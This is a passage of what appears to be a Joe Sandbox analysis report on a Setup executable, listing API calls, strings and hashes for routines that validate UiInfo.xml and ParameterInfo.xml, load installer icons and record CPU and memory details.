                                                              • API ID: H_prolog3$AddressCommandExceptionFilterGuaranteeHandleLineModuleProcStackThreadUnhandled_malloc
                                                              • String ID: SetThreadStackGuarantee$kernel32.dll$passive
                                                              • API String ID: 4088884676-825548933
                                                              • Opcode ID: dc7f2e178b8cd67aa3664308c5c9969b2e79fa274f34490af27e24124e16a183
                                                              • Instruction ID: 212dc8d68e0e2a34b17f1c48e4ea1745c153af80ae483bdc6b9d1d6c297bc486
                                                              • Opcode Fuzzy Hash: dc7f2e178b8cd67aa3664308c5c9969b2e79fa274f34490af27e24124e16a183
                                                              • Instruction Fuzzy Hash: D0418EB19053848EDB10CFA9C584699BBF4BF25708F60886ED05997F41C730D649CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C925B8C
                                                              • _memset.LIBCMT ref: 6C925BBB
                                                                • Part of subcall function 6C948E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9599FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C948E6E
                                                              • FindFirstFileW.KERNEL32(?,?,????), ref: 6C925BDA
                                                              • FindNextFileW.KERNELBASE(?,?), ref: 6C925CA8
                                                              • FindClose.KERNEL32(?), ref: 6C925CC1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Find$File$AppendCloseFirstH_prolog3_NextPath_memset
                                                              • String ID: ????
                                                              • API String ID: 2365859831-1216582215
                                                              • Opcode ID: 9fcdfd55eb312599cf725ac58ea78a5068cdc4e67a1479d745662c6283645032
                                                              • Instruction ID: 41e9108ed2d13e359bb2d9df9c81eec3201c4bc1232d4d6746304c3f1d9a514a
                                                              • Opcode Fuzzy Hash: 9fcdfd55eb312599cf725ac58ea78a5068cdc4e67a1479d745662c6283645032
                                                              • Instruction Fuzzy Hash: 1431C6718052199ADF20EF65CC8CBEE73B8AF21359F104696F444D6A94EB39CAC8CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C48EFFE
                                                              • _memset.LIBCMT ref: 6C48F018
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 6C48F032
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 6C48F04D
                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 6C48F061
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32_memset
                                                              • String ID:
                                                              • API String ID: 949835396-0
                                                              • Opcode ID: 5fd2b166bb75b91007f77d6e978f388552bd50403fa0dfceab18bb8c12cec6c6
                                                              • Instruction ID: c1c262f894fdad4e01bbb6795e27cec53adea632ca6edb65a5111f249e02086e
                                                              • Opcode Fuzzy Hash: 5fd2b166bb75b91007f77d6e978f388552bd50403fa0dfceab18bb8c12cec6c6
                                                              • Instruction Fuzzy Hash: B0019675A03118AFD710EBA5DC4CEAE77B8EB47315F50015AE814D3680D774DE46CAA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Item$MessageSend$CallbackDispatcherParentTextUserWindow
                                                              • String ID:
                                                              • API String ID: 2000255171-0
                                                              • Opcode ID: 4aec542958c1ba33b69a734db882570818681acd101a96f53df1ca3f69928531
                                                              • Instruction ID: e3de960906fa3bd1b1d5dc362ea204f09f01ec959ac1123262f1880039accafe
                                                              • Opcode Fuzzy Hash: 4aec542958c1ba33b69a734db882570818681acd101a96f53df1ca3f69928531
                                                              • Instruction Fuzzy Hash: DEC1AF7160422A9FDB14EF68C580F9EBFB4FB08308F50461AE96697690D770E962CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

6c91420c 486->509 508->509 515 6c95c6c2-6c95c6c9 508->515 520 6c95c713-6c95c740 call 6c947a92 call 6c932d50 509->520 521 6c95c6ea-6c95c6f8 509->521 515->509 535 6c95c755-6c95c8ec call 6c968f0e call 6c937148 call 6c937773 * 2 call 6c937292 call 6c968f0e * 2 call 6c937292 call 6c95e49e call 6c95d985 call 6c968f0e * 3 CloseHandle call 6c968f0e * 2 call 6c936f61 call 6c94be94 call 6c968f0e * 2 call 6c945a5a call 6c9343ed call 6c9141a9 call 6c925b32 call 6c95d6d1 520->535 536 6c95c742-6c95c750 call 6c9663d7 520->536 524 6c95c6ff-6c95c70d 521->524 525 6c95c6fa-6c95c6fd 521->525 524->520 525->520 525->524 536->535
                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 6C95B39A
                                                                • Part of subcall function 6C95D446: __EH_prolog3_catch.LIBCMT ref: 6C95D44D
                                                                • Part of subcall function 6C95D446: GetCommandLineW.KERNEL32(0000006C,6C95B3B6,?,00000738,6C94FA6E,?,6C90A794,02642228), ref: 6C95D48E
                                                                • Part of subcall function 6C95D446: CoInitialize.OLE32(00000000), ref: 6C95D4EF
                                                                • Part of subcall function 6C95D713: CreateThread.KERNEL32(00000000,00000000,6C9623E8,?,00000000,00000000), ref: 6C95D729
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C95988C: __EH_prolog3.LIBCMT ref: 6C959893
                                                                • Part of subcall function 6C95988C: GetCommandLineW.KERNEL32(0000002C,6C95D52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C9598B4
                                                                • Part of subcall function 6C95988C: PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 6C95996E
                                                                • Part of subcall function 6C944E70: __EH_prolog3.LIBCMT ref: 6C944E77
                                                                • Part of subcall function 6C944E70: __CxxThrowException@8.LIBCMT ref: 6C944F68
                                                                • Part of subcall function 6C944E70: ReadFile.KERNEL32(?,?,00000002,?,00000000,?,80000000,00000001,00000003,00000080,00000000,?,?,?,?,0000002C), ref: 6C944F7E
                                                                • Part of subcall function 6C944E70: FindCloseChangeNotification.KERNEL32(?), ref: 6C944FA1
                                                                • Part of subcall function 6C91A8CC: __EH_prolog3.LIBCMT ref: 6C91A8D3
                                                                • Part of subcall function 6C91A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A90B
                                                                • Part of subcall function 6C91A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A964
                                                                • Part of subcall function 6C91A8CC: __CxxThrowException@8.LIBCMT ref: 6C91AA28
                                                                • Part of subcall function 6C945033: __EH_prolog3.LIBCMT ref: 6C94503A
                                                                • Part of subcall function 6C945033: __CxxThrowException@8.LIBCMT ref: 6C9450B6
                                                                • Part of subcall function 6C9451C0: __EH_prolog3_catch.LIBCMT ref: 6C9451C7
                                                                • Part of subcall function 6C9451C0: CoInitialize.OLE32(00000000), ref: 6C9451DC
                                                              • SysFreeString.OLEAUT32(?), ref: 6C95B471
                                                                • Part of subcall function 6C95D01E: __EH_prolog3.LIBCMT ref: 6C95D025
                                                                • Part of subcall function 6C95D01E: PathFileExistsW.SHLWAPI(?,6C9061FC,graphics,?,00000054,6C95B48A,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml), ref: 6C95D0BE
                                                                • Part of subcall function 6C9259B8: __EH_prolog3.LIBCMT ref: 6C9259BF
                                                                • Part of subcall function 6C926083: __EH_prolog3_catch.LIBCMT ref: 6C92608A
                                                              • GetCommandLineW.KERNEL32(?,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml,?,?,00000738,6C94FA6E,?), ref: 6C95B51F
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                                • Part of subcall function 6C91A378: __EH_prolog3.LIBCMT ref: 6C91A37F
                                                              • __CxxThrowException@8.LIBCMT ref: 6C95B50F
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                                • Part of subcall function 6C913A16: __EH_prolog3.LIBCMT ref: 6C913A1D
                                                              • GetThreadLocale.KERNEL32(?,passive,00000000), ref: 6C95B6C8
                                                                • Part of subcall function 6C947889: __EH_prolog3.LIBCMT ref: 6C947890
                                                                • Part of subcall function 6C947DB0: __EH_prolog3.LIBCMT ref: 6C947DB7
                                                                • Part of subcall function 6C947C9E: __EH_prolog3.LIBCMT ref: 6C947CA5
                                                                • Part of subcall function 6C947E78: __EH_prolog3.LIBCMT ref: 6C947E7F
                                                                • Part of subcall function 6C9143C4: __EH_prolog3.LIBCMT ref: 6C9143CB
                                                                • Part of subcall function 6C915E41: __EH_prolog3.LIBCMT ref: 6C915E48
                                                                • Part of subcall function 6C915E41: PathFindFileNameW.SHLWAPI(?,?,?,0000000C,6C915E13,?,6C94831D,?,0000000C,6C917D3D,?,00000000,?,?,6C90AB18,00000008), ref: 6C915E83
                                                                • Part of subcall function 6C915E41: PathFindExtensionW.SHLWAPI(?), ref: 6C915EA0
                                                                • Part of subcall function 6C946DCB: GetCommandLineW.KERNEL32(512AC3CC,?,?,00000000,?,?,?,?,?,ParameterInfo.xml,?,?,?,00000000,?,?), ref: 6C946E16
                                                                • Part of subcall function 6C94594B: __EH_prolog3.LIBCMT ref: 6C945952
                                                              • CloseHandle.KERNEL32(?,?,?,?,OneInstance,?,00000000,?,ParameterInfo.xml,?,?,00000738,6C94FA6E,?,6C90A794,02642228), ref: 6C95BED4
                                                                • Part of subcall function 6C94AE4A: __EH_prolog3.LIBCMT ref: 6C94AE51
                                                              • CloseHandle.KERNEL32(?,?,00000000,?,00000001,00000007,?,OneInstance,?,?,00000000,?,?,?,?,?), ref: 6C95BE22
                                                                • Part of subcall function 6C936F61: __EH_prolog3.LIBCMT ref: 6C936F68
                                                                • Part of subcall function 6C94BE94: _free.LIBCMT ref: 6C94BEBC
                                                                • Part of subcall function 6C94BE94: _free.LIBCMT ref: 6C94BECD
                                                              • CloseHandle.KERNEL32(?), ref: 6C95BF2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Path$CloseCommandException@8FileH_prolog3_catchLineThrow$FindHandle$InitializeNameRelativeThread_free$ChangeCreateDispatcherExceptionExistsExtensionFreeLocaleModuleNotificationReadStringUser
                                                              • String ID: !$#(loc.ids_wer_message)$%TEMP%\$Blocker$Command-line option error: $CreateFilesInUser$CreateHelpUsage$CreateUiMode$FactoryInitialization$InvalidArguments$OneInstance$PISemanticChecker$ParameterInfo.xml$Parameterinfo.xml or UiInfo.xml has a #Loc that is not defined in LocalizeData.xml $W$passive
                                                              • API String ID: 1658402695-280204926
                                                              • Opcode ID: f437b631f61fa9a68e5a6b320e72f3acdbcd6c9934e36346aab555358f82a4d2
                                                              • Instruction ID: a11712d8f9e37bc0f5098c730468d7cd2ef87fd43cb66d818dbff6d304afcfbc
                                                              • Opcode Fuzzy Hash: f437b631f61fa9a68e5a6b320e72f3acdbcd6c9934e36346aab555358f82a4d2
                                                              • Instruction Fuzzy Hash: 46E25B71D00258DFDF11DBA8C944ADDBBB8AF29318F148199E418B7B91CB34DA49CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C4A6981
                                                                • Part of subcall function 6C491E75: __EH_prolog3.LIBCMT ref: 6C491E7C
                                                                • Part of subcall function 6C491E75: GetThreadLocale.KERNEL32(?,00000004,6C496734,LBqIl,0000004C,6C497142,?,00000000), ref: 6C491E8E
                                                              • CoCreateInstance.OLE32(6C487980,00000000,00000017,6C487970,?,?,00000068,6C4A65A6,?,?,?,?,6C4A2A30,?,00000000,?), ref: 6C4A69AC
                                                              • PathIsRelativeW.SHLWAPI(?,?,?,?,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000), ref: 6C4A6A7F
                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6C49E271), ref: 6C4A6A8C
                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 6C4A6ABE
                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6C49E271), ref: 6C4A6AC1
                                                              • CoCreateInstance.OLE32(6C487990,00000000,00000017,6C4879A0,?), ref: 6C4A6B4C
                                                                • Part of subcall function 6C48C98C: GetThreadLocale.KERNEL32 ref: 6C48C999
                                                                • Part of subcall function 6C48B93E: __EH_prolog3.LIBCMT ref: 6C48B945
                                                                • Part of subcall function 6C49F21D: PathAppendW.SHLWAPI(00000000,00000000,?,00000105,?,?,80070057,80070057,6C48C3AE), ref: 6C49F241
                                                              • VariantClear.OLEAUT32(?), ref: 6C4A6BBD
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                              • PathIsRelativeW.SHLWAPI(?,?), ref: 6C4A6BE8
                                                              • PathFileExistsW.SHLWAPI(?), ref: 6C4A6BF5
                                                              • PathFileExistsW.SHLWAPI(?,?), ref: 6C4A6C27
                                                              • PathFileExistsW.SHLWAPI(?), ref: 6C4A6C2A
                                                              • VariantClear.OLEAUT32(?), ref: 6C4A6C8E
                                                              • __CxxThrowException@8.LIBCMT ref: 6C4A6CAB
                                                              • VariantClear.OLEAUT32(?), ref: 6C4A6CED
                                                              • VariantClear.OLEAUT32(?), ref: 6C4A6DE9
                                                                • Part of subcall function 6C48CA39: __EH_prolog3.LIBCMT ref: 6C48CA40
                                                              Strings
                                                              • Loading file - %s, xrefs: 6C4A6AF3
                                                              • Validation FAILED Reason:%s, xrefs: 6C4A6D5F
                                                              • CoCreateInstance of DOMDocument60 failed with hr = 0x%x (%s), xrefs: 6C4A69DC
                                                              • UiInfo.xml, xrefs: 6C4A6A65
                                                              • Validation FAILED Err on line: %d @column: %dReason:%s SrcText:%s, xrefs: 6C4A6E8B
                                                              • Stopping XML schema validation of UI information and continuing, xrefs: 6C4A69FA, 6C4A6B9A
                                                              • http://schemas.microsoft.com/SetupUI/2008/01/imui, xrefs: 6C4A6C7A
                                                              • UIInfo.xml, xrefs: 6C4A6D8C, 6C4A6EC3
                                                              • CoCreateInstance of XMLSchemaCache60 failed with hr = 0x%x (%s), xrefs: 6C4A6B7C
                                                              • Add to schema collection schema file - %s, xrefs: 6C4A6C4D
                                                              • SetupUi.xsd, xrefs: 6C4A6BD7
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Path$ExistsFile$H_prolog3$ClearVariant$CreateInstanceLocaleRelativeThread$AppendException@8Throw
                                                              • String ID: Validation FAILED Reason:%s$Validation FAILED Err on line: %d @column: %dReason:%s SrcText:%s$Add to schema collection schema file - %s$CoCreateInstance of DOMDocument60 failed with hr = 0x%x (%s)$CoCreateInstance of XMLSchemaCache60 failed with hr = 0x%x (%s)$Loading file - %s$SetupUi.xsd$Stopping XML schema validation of UI information and continuing$UIInfo.xml$UiInfo.xml$http://schemas.microsoft.com/SetupUI/2008/01/imui
                                                              • API String ID: 3881019808-2332759018
                                                              • Opcode ID: 69ecc907020794ca5640540e39ff77974d8de59f2003a435c62e580541a7d8d8
                                                              • Instruction ID: 079e9f07e68add72fdc127d492efce9777c047e864496ce3de802121243822b2
                                                              • Opcode Fuzzy Hash: 69ecc907020794ca5640540e39ff77974d8de59f2003a435c62e580541a7d8d8
                                                              • Instruction Fuzzy Hash: 17024871D01249EFDF00DBE8C988EDDBBB8AF19308F244599E510BB755D7319A0ACBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C492B1B
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                                • Part of subcall function 6C48D76F: __EH_prolog3.LIBCMT ref: 6C48D776
                                                                • Part of subcall function 6C48D76F: SysFreeString.OLEAUT32(00000000), ref: 6C48D7CA
                                                              • PathIsRelativeW.SHLWAPI(?,00000001,?,000000FF,?,?,?,?,00000001,?,?,?,000000FF,00000088,6C4A6F88,?), ref: 6C492D9C
                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6C49E271,00000000), ref: 6C492DAF
                                                              • PathFileExistsW.SHLWAPI(00000005,?,?,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 6C492DF0
                                                              • PathFileExistsW.SHLWAPI(00000005,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6C49E271,00000000), ref: 6C492E0F
                                                              • PathIsRelativeW.SHLWAPI(00000001,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6C49E271,00000000), ref: 6C492E2F
                                                              • PathFileExistsW.SHLWAPI(00000001,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6C49E271,00000000), ref: 6C492E40
                                                              • __CxxThrowException@8.LIBCMT ref: 6C492EBB
                                                              • PathFileExistsW.SHLWAPI(00000005,00000001,?,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 6C492EEF
                                                                • Part of subcall function 6C49F21D: PathAppendW.SHLWAPI(00000000,00000000,?,00000105,?,?,80070057,80070057,6C48C3AE), ref: 6C49F241
                                                              • PathFileExistsW.SHLWAPI(00000005,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6C49E271,00000000), ref: 6C492F0E
                                                                • Part of subcall function 6C4A83ED: _memcpy_s.LIBCMT ref: 6C4A844E
                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000), ref: 6C49309C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Path$ExistsFile$H_prolog3$Relative$AppendExceptionException@8FreeRaiseStringThrow_memcpy_s
                                                              • String ID: %$Caption$CreateLayout$Default$HeaderImage$Install$Repair$Uninstall$UninstallPatch$Watermark$WizardImages
                                                              • API String ID: 2164894574-1575104729
                                                              • Opcode ID: e192402bd9b49cab3ffbfcc4e5e32becc5168c03244b515d051b79b1fcfea4cf
                                                              • Instruction ID: 0f49262634d7eb982509b3c1901291f48b38ad72879d412db8a43e196f0d8518
                                                              • Opcode Fuzzy Hash: e192402bd9b49cab3ffbfcc4e5e32becc5168c03244b515d051b79b1fcfea4cf
                                                              • Instruction Fuzzy Hash: 97122B7190125DEFDF00DBE8C984EDDBBB8AF05318F148159E424AB795DB34DA0ACBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C9509ED
                                                                • Part of subcall function 6C915727: GetModuleHandleW.KERNEL32(kernel32.dll,?,6C915782,00000000,6C94831D), ref: 6C915731
                                                                • Part of subcall function 6C915727: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 6C915741
                                                              • GetLastError.KERNEL32 ref: 6C950A27
                                                              • GetLastError.KERNEL32 ref: 6C950A82
                                                              • RegOpenKeyExW.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020019,?,?,00000000,?,Failed to record NumberOfProcessor), ref: 6C950ADE
                                                              • RegQueryValueExW.KERNEL32(?,~MHz,00000000,00000000,?,?), ref: 6C950B0D
                                                              • RegQueryValueExW.ADVAPI32(?,~Mhz,00000000,00000000,?,?), ref: 6C950B2D
                                                              • RegQueryValueExW.ADVAPI32(?,~mhz,00000000,00000000,?,?), ref: 6C950B4D
                                                              • RegCloseKey.KERNEL32(?), ref: 6C950B55
                                                              • GetLastError.KERNEL32 ref: 6C950B75
                                                              • _memset.LIBCMT ref: 6C950BCC
                                                              • GlobalMemoryStatusEx.KERNEL32(?,?,?,6C90A738,?,?,00000738,6C94FA6E,?,6C90A794,02642228), ref: 6C950BEA
                                                              • GetLastError.KERNEL32(?,?,00000738,6C94FA6E,?,6C90A794,02642228), ref: 6C950C15
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • GetLastError.KERNEL32(?,GlobalMemoryStatusEx failed,?,?,00000738,6C94FA6E,?,6C90A794,02642228), ref: 6C950C60
                                                                • Part of subcall function 6C951236: __EH_prolog3.LIBCMT ref: 6C95123D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$QueryValue$H_prolog3$AddressCloseGlobalH_prolog3_HandleMemoryModuleOpenProcStatus_memset
                                                              • String ID: Failed to record CpuArchitecture$Failed to record NumberOfProcessor$Failed to record SystemMemory$GlobalMemoryStatusEx failed$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz$~Mhz$~mhz
                                                              • API String ID: 2659457873-2309824155
                                                              • Opcode ID: e3b0630a628c47e69b2a5dba51f56524d402ce832c12923414f5be25ddcd1ace
                                                              • Instruction ID: a9ef59031666c67212383f5e8f5374837bd1a53030b719f7bf0059d93390e8dd
                                                              • Opcode Fuzzy Hash: e3b0630a628c47e69b2a5dba51f56524d402ce832c12923414f5be25ddcd1ace
                                                              • Instruction Fuzzy Hash: 25818B71A00249ABDB20CFE4CC45FDEBBB9AF55358F204629E115EB690D730DA15CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C95D025
                                                                • Part of subcall function 6C915D3F: __EH_prolog3.LIBCMT ref: 6C915D46
                                                                • Part of subcall function 6C915D3F: GetModuleFileNameW.KERNEL32(6C8F0000,00000010,00000104,?,6C94831D,00000000), ref: 6C915D93
                                                                • Part of subcall function 6C948E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9599FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C948E6E
                                                              • PathFileExistsW.SHLWAPI(?,6C9061FC,graphics,?,00000054,6C95B48A,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml), ref: 6C95D0BE
                                                              • __CxxThrowException@8.LIBCMT ref: 6C95D16E
                                                                • Part of subcall function 6C948F73: PathRemoveFileSpecW.SHLWAPI(00000000,2806C750,00000010,80004005,6C915DB8,6C94F845,00000010,?,6C94831D,00000000), ref: 6C948F84
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: FilePath$H_prolog3$AppendException@8ExistsModuleNameRemoveSpecThrow
                                                              • String ID: Graphic file %s does not exists$Print.ico$Rotate1.ico$Rotate2.ico$Rotate3.ico$Rotate4.ico$Rotate5.ico$Rotate6.ico$Rotate7.ico$Rotate8.ico$Save.ico$Setup.ico$SysReqMet.ico$SysReqNotMet.ico$graphics$stop.ico$warn.ico
                                                              • API String ID: 419085990-1965610755
                                                              • Opcode ID: 66c74831d878da533e0a1741a8ee8248ffabdd969db1dbb8d3853d11964c0ca9
